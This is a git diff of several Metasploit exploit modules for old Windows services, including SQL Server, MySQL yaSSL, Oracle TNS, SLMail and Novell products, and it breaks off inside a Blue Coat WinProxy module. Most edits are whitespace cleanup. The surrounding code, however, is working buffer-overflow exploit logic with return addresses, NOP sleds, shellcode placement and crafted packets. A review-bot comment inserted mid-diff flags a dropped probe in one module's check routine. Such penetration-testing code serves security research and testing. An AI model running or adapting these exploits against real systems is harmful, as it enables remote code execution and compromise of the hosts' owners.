@@ -82,26 +80,26 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - + connect_udp print_status(sprintf("Sending UDP packet with return address 0x%.8x", target.ret)) print_status("Execute 'net start sqlserveragent' once access is obtained"); # \x68:888 => push dword 0x3838383a buf = "\x04" + rand_text_english(800, payload_badchars) + "\x68:888" - + # Return to the stack pointer buf[ 97, 4] = [target.ret].pack('V') - + # Which lands right here buf[101, 6] = make_nops(6) - + # Jumps 8 bytes ahead buf[107, 2] = "\xeb\x08" - + # Write to thread storage space to avoid a crash buf[109, 8] = [0x7ffde0cc, 0x7ffde0cc].pack('VV') - + # And finally into the payload buf[117,payload.encoded.length] = payload.encoded diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 96afa5edbb..4eebfe27b3 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -3,31 +3,29 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::MSSQL def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Microsoft SQL Server Hello Overflow', 'Description' => %q{ - By sending malformed data to TCP port 1433, an + By sending malformed data to TCP port 1433, an unauthenticated remote attacker could overflow a buffer and possibly execute code on the server with SYSTEM level privileges. This module should work against any vulnerable SQL Server 2000 or MSDE install (< SP3). - + }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, 
@@ -47,9 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ - [ + [ 'MSSQL 2000 / MSDE <= SP2', { 'Platform' => 'win', @@ -61,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Aug 5 2002', 'DefaultTarget' => 0)) end - + def check info = mssql_ping if (info['ServerName']) @@ -80,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02" + "\x10\x00\x00\x00" + rand_text_english(528, payload_badchars) + - "\x1B\xA5\xEE\x34" + + "\x1B\xA5\xEE\x34" + rand_text_english(4, payload_badchars) + [ target['Rets'][0] ].pack('V') + [ target['Rets'][1], target['Rets'][1] ].pack('VV') + @@ -91,9 +89,9 @@ class Metasploit3 < Msf::Exploit::Remote "\x00\x24\x01\x00\x00" sock.put(buf) - + handler disconnect end - + end diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index a9f824c044..609250d980 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb 
@@ -3,28 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'MySQL yaSSL SSL Hello Message Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the yaSSL (1.7.5 and earlier) - implementation bundled with MySQL <= 6.0. By sending a specially crafted - Hello packet, an attacker may be able to execute arbitrary code. + implementation bundled with MySQL <= 6.0. By sending a specially crafted + Hello packet, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -48,15 +46,15 @@ class Metasploit3 < Msf::Exploit::Remote 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'MySQL 5.0.45-community-nt', { 'Ret' => 0x008b9d45 } ], - [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ], + [ 'MySQL 5.1.22-rc-community', { 'Ret' => 0x008b04c9 } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 4 2008')) - - register_options([ Opt::RPORT(3306) ], self) + + register_options([ Opt::RPORT(3306) ], self) end def exploit 
@@ -66,20 +64,20 @@ class Metasploit3 < Msf::Exploit::Remote req_uno = [0x01000020].pack('V') - req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V') - req_dos << [0x00000008].pack('V') + [0x00000000].pack('V') - req_dos << [0x00000000].pack('V') + [0x00000000].pack('V') + req_dos = [0x00008daa].pack('V') + [0x40000000].pack('V') + req_dos << [0x00000008].pack('V') + [0x00000000].pack('V') req_dos << [0x00000000].pack('V') + [0x00000000].pack('V') - req_dos << [0x03010000].pack('V') + [0x00000001].pack('V') - req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length) - req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V') + req_dos << [0x00000000].pack('V') + [0x00000000].pack('V') + req_dos << [0x03010000].pack('V') + [0x00000001].pack('V') + req_dos << "\x00\x0F\xFF" + rand_text_alphanumeric(3917 - payload.encoded.length) + req_dos << make_nops(100) + payload.encoded + [target.ret].pack('V') req_dos << make_nops(16) + [0xe8, -650].pack('CV') + rand_text_alphanumeric(1024) print_status("Trying target #{target.name}...") sock.put(req_uno) sock.put(req_dos) - + handler disconnect end diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index cb032b25a3..8f22c47e28 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ 
@@ -17,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Omni-NFS Server Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Xlink Omni-NFS Server 5.2 - When sending a specially crafted nfs packet, an attacker may be able - to execute arbitrary code. + When sending a specially crafted nfs packet, an attacker may be able + to execute arbitrary code. }, 'Author' => [ 'MC' ], 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2006-5780' ], [ 'BID', '20941' ], [ 'URL', 'http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm' ], @@ -42,14 +46,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'Windows 2000 SP4 English', { 'Ret' => 0x0040bb2e } ], + [ 'Windows 2000 SP4 English', { 'Ret' => 0x0040bb2e } ], ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 06 2006')) - register_options([Opt::RPORT(2049)], self.class) - + register_options([Opt::RPORT(2049)], self.class) end def exploit @@ -75,10 +78,10 @@ class Metasploit3 < Msf::Exploit::Remote pkt << buff[300,400] sploit = [pkt.length | 0x80000000].pack('N') + pkt - + print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index 6518eb75ad..21f3dcd967 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -22,13 +20,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Microsoft Outlook Express NNTP Response Parsing Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in the news reader of Microsoft - Outlook Express. + Outlook Express. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2005-1213' ], [ 'OSVDB', '17306' ], [ 'BID', '13951' ], @@ -57,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The NNTPServer daemon port to listen on", 119 ]) ], self.class) end @@ -72,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote def on_client_data(client) return if ((p = regenerate_payload(client)) == nil) - filler = "215 list\r\n" + "group " + filler = "215 list\r\n" + "group " filler << rand_text_english(target['Offset']) seh = generate_seh_payload(target.ret) sploit = filler + seh + " 1 y\r\n\.\r\n" diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 292fcd0d44..2bfc2b2c5e 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking 
@@ -21,13 +19,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Novell GroupWise Messenger Client Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Novell's GroupWise Messenger Client. - By sending a specially crafted HTTP response, an attacker may be able to execute - arbitrary code. + By sending a specially crafted HTTP response, an attacker may be able to execute + arbitrary code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2008-2703' ], [ 'OSVDB', '46041' ], @@ -42,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 750, 'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", - 'DisableNops' => 'True', + 'DisableNops' => 'True', 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, @@ -51,14 +49,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Novell GroupWise Messenger 2.0 Client', { 'Ret' => 0x502de115 } ], - [ 'Novell GroupWise Messenger 1.0 Client', { 'Ret' => 0x1000e105 } ], + [ 'Novell GroupWise Messenger 1.0 Client', { 'Ret' => 0x1000e105 } ], ], 'Privileged' => false, 'DisclosureDate' => 'July 2 2008', 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The daemon port to listen on.", 8300 ]) ], self.class) end @@ -68,13 +66,13 @@ class Metasploit3 < Msf::Exploit::Remote client.get_once - date = Time.gm(2008,nil,nil,nil,nil,nil) + date = Time.gm(2008,nil,nil,nil,nil,nil) rand_1 = rand_text_english(5) rand_2 = rand_text_english(4) rand_3 = rand_text_english(rand(8) + 1) rand_4 = rand_text_alpha_upper(8) rand_5 = rand_text_english(3) - + res = "HTTP/1.0 200\r\n" res << "Date: #{date}\r\n" res << "Pragma: no-cache\r\n" 
@@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote res << "\0\n\0\0\0Client \0\n\0\r\0\0\0nnmLastLogin\0\13\0\0\x001200112090\0\t\0\30\0\0\0" res << "NM_A_FA_CLIENT_SETTINGS\0\1\0\0\0\n\0\21\0\0\0Novell.AskToSave" res << "\0\2\0\0\x001\0\t\0\e\0\0\0NM_A_FA_INFO_DISPLAY_ARRAY" - res << "\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0#{rand_1}\@#{rand_4}.#{rand_5}.xx" + res << "\0\1\0\0\0\n\0\27\0\0\0Internet EMail Address\0\26\0\0\0#{rand_1}\@#{rand_4}.#{rand_5}.xx" res << "\0\b\0\16\0\0\0NM_A_UD_BUILD\0\a\0\0\0\n\0\13\0\0\0NM_A_SZ_DN\x001\0\0\0" res << "CN=ISR000,OU=IT,OU=ISR_,OU=BA,OU=AR,O=#{rand_4}XX" res << "\0\t\0\24\0\0\0NM_A_FA_AU_SETTINGS\0\1\0\0\0\n\0\22\0\0\0" diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 149e811c21..58651d1a32 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -1,5 +1,15 @@ -require 'msf/core' +## +# $Id$ +## +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking 
@@ -7,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell NetMail <= 3.52d NMAP STOR Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Novell's Netmail 3.52 NMAP STOR - verb. By sending an overly long string, an attacker can overwrite the - buffer and control program execution. + This module exploits a stack overflow in Novell's Netmail 3.52 NMAP STOR + verb. By sending an overly long string, an attacker can overwrite the + buffer and control program execution. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -35,17 +45,16 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ - ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7cdc97fb }], + ['Windows 2000 Pro SP4 English', { 'Ret' => 0x7cdc97fb }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 23 2006')) - register_options([Opt::RPORT(689)], self.class) - + register_options([Opt::RPORT(689)], self.class) end - + def exploit connect sock.get_once @@ -54,9 +63,9 @@ class Metasploit3 < Msf::Exploit::Remote sock.put(auth + "\r\n") res = sock.get_once - + sploit = "STOR " + rand_text_english(253) + [ target.ret ].pack('V') - sploit << " " + rand_text_english(20) + "\r\n" + payload.encoded + sploit << " " + rand_text_english(20) + "\r\n" + payload.encoded if (res =~ /1000/) print_status("Trying target #{target.name}...") @@ -64,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote else print_status("Not in Trusted Hosts.") end - + handler disconnect end diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index b0571d6b35..6ae616047f 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb 
@@ -3,29 +3,26 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Novell ZENworks 6.5 Desktop/Server Management Overflow', 'Description' => %q{ - This module exploits a heap overflow in the Novell ZENworks + This module exploits a heap overflow in the Novell ZENworks Desktop Management agent. This vulnerability was discovered by Alex Wheeler. - }, 'Author' => [ 'anonymous' ], 'License' => BSD_LICENSE, @@ -44,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'BadChars' => "\x00", 'StackAdjustment' => -3500, }, - 'Targets' => + 'Targets' => [ [ 'Windows XP/2000/2003- ZENworks 6.5 Desktop/Server Agent', 
@@ -60,37 +57,37 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect - + hello = "\x00\x06\x05\x01\x10\xe6\x01\x00\x34\x5a\xf4\x77\x80\x95\xf8\x77" print_status("Sending version identification") sock.put(hello) - + pad = Rex::Text.rand_text_alphanumeric(6, payload_badchars) ident = sock.get_once if !(ident and ident.length == 16) print_status("Failed to receive agent version identification") return end - + print_status("Received agent version identification") print_status("Sending client acknowledgement") sock.put("\x00\x01") - + # Stack overflow in ZenRem32.exe / ZENworks Server Management sock.put("\x00\x06#{pad}\x00\x06#{pad}\x7f\xff" + payload.encoded + "\x00\x01") - + ack = sock.get_once sock.put("\x00\x01") sock.put("\x00\x02") - + print_status("Sending final payload") sock.put("\x00\x24" + ("A" * 0x20) + [ target.ret ].pack('V')) - + print_status("Overflow request sent, sleeping for four seconds") sleep(4) - + handler disconnect end - + end diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index 32b72295ec..5e5b79f3b4 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -11,14 +15,14 @@ class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::NDMP - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Oracle Secure Backup NDMP_CONNECT_CLIENT_AUTH Buffer Overflow', 'Description' => %q{ The module exploits a stack overflow in Oracle Secure Backup. - When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, - an attacker may be able to execute arbitrary code. + When sending a specially crafted NDMP_CONNECT_CLIENT_AUTH packet, + an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], 'License' => MSF_LICENSE, @@ -42,26 +46,26 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff", }, - 'Targets' => + 'Targets' => [ [ 'Oracle Secure Backup 10.1.0.3 (Windows 2003 SP0/Windows XP SP3)', { 'Ret' => 0x608f5a28 } ], # oracore10.dll ], - 'DisclosureDate' => 'Jan 14 2009', + 'DisclosureDate' => 'Jan 14 2009', 'DefaultTarget' => 0)) - - register_options([Opt::RPORT(10000)], self.class) + + register_options([Opt::RPORT(10000)], self.class) end def exploit connect - + print_status("Trying target #{target.name}...") - + ndmp_recv() - + username = rand_text_alphanumeric(3789 - payload.encoded.length) - username << payload.encoded + Rex::Arch::X86.jmp_short(6) - username << make_nops(2) + [target.ret].pack('V') + [0xe8, -850].pack('CV') + username << payload.encoded + Rex::Arch::X86.jmp_short(6) + username << make_nops(2) + [target.ret].pack('V') + [0xe8, -850].pack('CV') username << rand_text_alphanumeric(5000 - 3793 - payload.encoded.length - 8 - 5) password = rand_text_alphanumeric(rand(25) + 1) @@ -82,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote print_status("Sending authentication request...") ndmp_send(auth) - + handler disconnect end 
diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index 4852c7ba2b..9ec13afbc5 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -16,16 +20,16 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Oracle 8i. When + This module exploits a stack overflow in Oracle 8i. When sending a specially crafted packet containing a overly long - ARGUMENTS string to the TNS service, an attacker may be able + ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2001-0499' ], [ 'OSVDB', '9427'], [ 'BID', '2941' ], @@ -50,23 +54,22 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 28 2001')) - register_options([Opt::RPORT(1521)], self.class) - + register_options([Opt::RPORT(1521)], self.class) end def check connect version = "(CONNECT_DATA=(COMMAND=VERSION))" - + pkt = tns_packet(version) sock.put(pkt) - + sock.get_once res = sock.get_once(-1, 1) - + disconnect if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) 
@@ -83,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966) sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))" - + pkt = tns_packet(sploit) print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index ea86ef2c92..2ecb752ea1 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -69,8 +69,10 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 20 2009')) - register_options([Opt::RPORT(1521)], self.class) - + register_options( + [ + Opt::RPORT(1521) + ], self.class) end @@ -90,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote mytarget = nil if target.name =~ /Automatic/ - print_status("Attempting automatic target detection...") + print_status("Attempting automatic target detection...") version = tns_version if (not version) @@ -104,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote end if (not mytarget) - raise RuntimeError, "Unable to automatically detect the target" + raise RuntimeError, "Unable to automatically detect the target" end print_status("Automatically detected target \"#{mytarget.name}\"") diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index bab46952e5..6e16a9545b 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -16,15 +20,15 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Oracle TNS Listener SERVICE_NAME Buffer Overflow.', 'Description' => %q{ - This module exploits a stack overflow in Oracle. When - sending a specially crafted packet containing a long SERVICE_NAME + This module exploits a stack overflow in Oracle. When + sending a specially crafted packet containing a long SERVICE_NAME to the TNS service, an attacker may be able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2002-0965'], [ 'OSVDB', '5041'], [ 'BID', '4845'], 
@@ -51,46 +55,42 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'May 27 2002')) - register_options([Opt::RPORT(1521)], self.class) - + register_options([Opt::RPORT(1521)], self.class) end def check connect version = "(CONNECT_DATA=(COMMAND=VERSION))" - pkt = tns_packet(version) - sock.put(pkt) - - sock.get_once + sock.get_once res = sock.get_once(-1, 1) - + disconnect - if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) - return Exploit::CheckCode::Vulnerable - end - return Exploit::CheckCode::Safe + if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ ) + return Exploit::CheckCode::Vulnerable + end + return Exploit::CheckCode::Safe end def exploit connect - buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded - buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') - buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400) + buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded + buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V') + buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(400) - sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))" - - pkt = tns_packet(sploit) + sploit = "(DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=#{rhost}(PORT=#{rport}))(CONNECT_DATA=(SERVICE_NAME=#{buff})(CID=(PROGRAM=MSF))))" - print_status("Trying target #{target.name}...") - sock.put(pkt) + pkt = tns_packet(sploit) - handler + print_status("Trying target #{target.name}...") + sock.put(pkt) + + handler disconnect end diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index 726fe1cd85..0bb65be4bf 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb 
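Review bot: The new side of `check` in tns_service_name.rb no longer sends the VERSION probe: `pkt = tns_packet(version)` and `sock.put(pkt)` are removed and not re-added, so the method connects, reads from the socket without having written anything, and compares `res` against the version regex; on a listener that stays quiet `res` is presumably nil and `check` would always report `Exploit::CheckCode::Safe`. The hunk's line counts (46 old, 42 new) agree with those two lines being dropped by the commit rather than lost in this rendering. Restore them directly after the `version` assignment: `pkt = tns_packet(version)` followed by `sock.put(pkt)`. The tns_arguments.rb hunk above keeps both lines, so the two modules' otherwise identical `check` methods now diverge.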
@@ -3,52 +3,50 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Seattle Lab Mail 5.5 POP3 Buffer Overflow', 'Description' => %q{ - There exists an unauthenticated buffer overflow vulnerability - in the POP3 server of Seattle Lab Mail 5.5 when sending a password - with excessive length. + There exists an unauthenticated buffer overflow vulnerability + in the POP3 server of Seattle Lab Mail 5.5 when sending a password + with excessive length. - Successful exploitation should not crash either the - service or the server; however, after initial use the - port cannot be reused for successive exploitation until - the service has been restarted. Consider using a command - execution payload following the bind shell to restart - the service if you need to reuse the same port. + Successful exploitation should not crash either the + service or the server; however, after initial use the + port cannot be reused for successive exploitation until + the service has been restarted. Consider using a command + execution payload following the bind shell to restart + the service if you need to reuse the same port. - The overflow appears to occur in the debugging/error reporting - section of the slmail.exe executable, and there are multiple - offsets that will lead to successful exploitation. This exploit - uses 2606, the offset that creates the smallest overall payload. - The other offset is 4654. 
+ The overflow appears to occur in the debugging/error reporting + section of the slmail.exe executable, and there are multiple + offsets that will lead to successful exploitation. This exploit + uses 2606, the offset that creates the smallest overall payload. + The other offset is 4654. - The return address is overwritten with a "jmp esp" call from the - application library SLMFC.DLL found in %SYSTEM%\\system32\\. This - return address works against all version of Windows and service packs. + The return address is overwritten with a "jmp esp" call from the + application library SLMFC.DLL found in %SYSTEM%\\system32\\. This + return address works against all version of Windows and service packs. - The last modification date on the library is dated 06/02/99. Assuming - that the code where the overflow occurs has not changed in some time, - prior version of SLMail may also be vulnerable with this exploit. The - author has not been able to acquire older versions of SLMail for - testing purposes. Please let us know if you were able to get this - exploit working against other SLMail versions. + The last modification date on the library is dated 06/02/99. Assuming + that the code where the overflow occurs has not changed in some time, + prior version of SLMail may also be vulnerable with this exploit. The + author has not been able to acquire older versions of SLMail for + testing purposes. Please let us know if you were able to get this + exploit working against other SLMail versions. }, 'Author' => 'stinko', 'License' => MSF_LICENSE, @@ -63,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'thread', - }, + }, 'Payload' => { 'Space' => 600, @@ -71,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote 'MinNops' => 100, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows NT/2000/XP/2003 (SLMail 5.5)', { 'Ret' => 0x5f4a358f, 'Offset' => 2606 } ] ], 
@@ -84,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) end - + def exploit connect diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index a96c328119..0d042f36f4 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -23,20 +21,19 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Blue Coat WinProxy Host Header Overflow', 'Description' => %q{ - This module exploits a buffer overflow in the Blue Coat Systems WinProxy + This 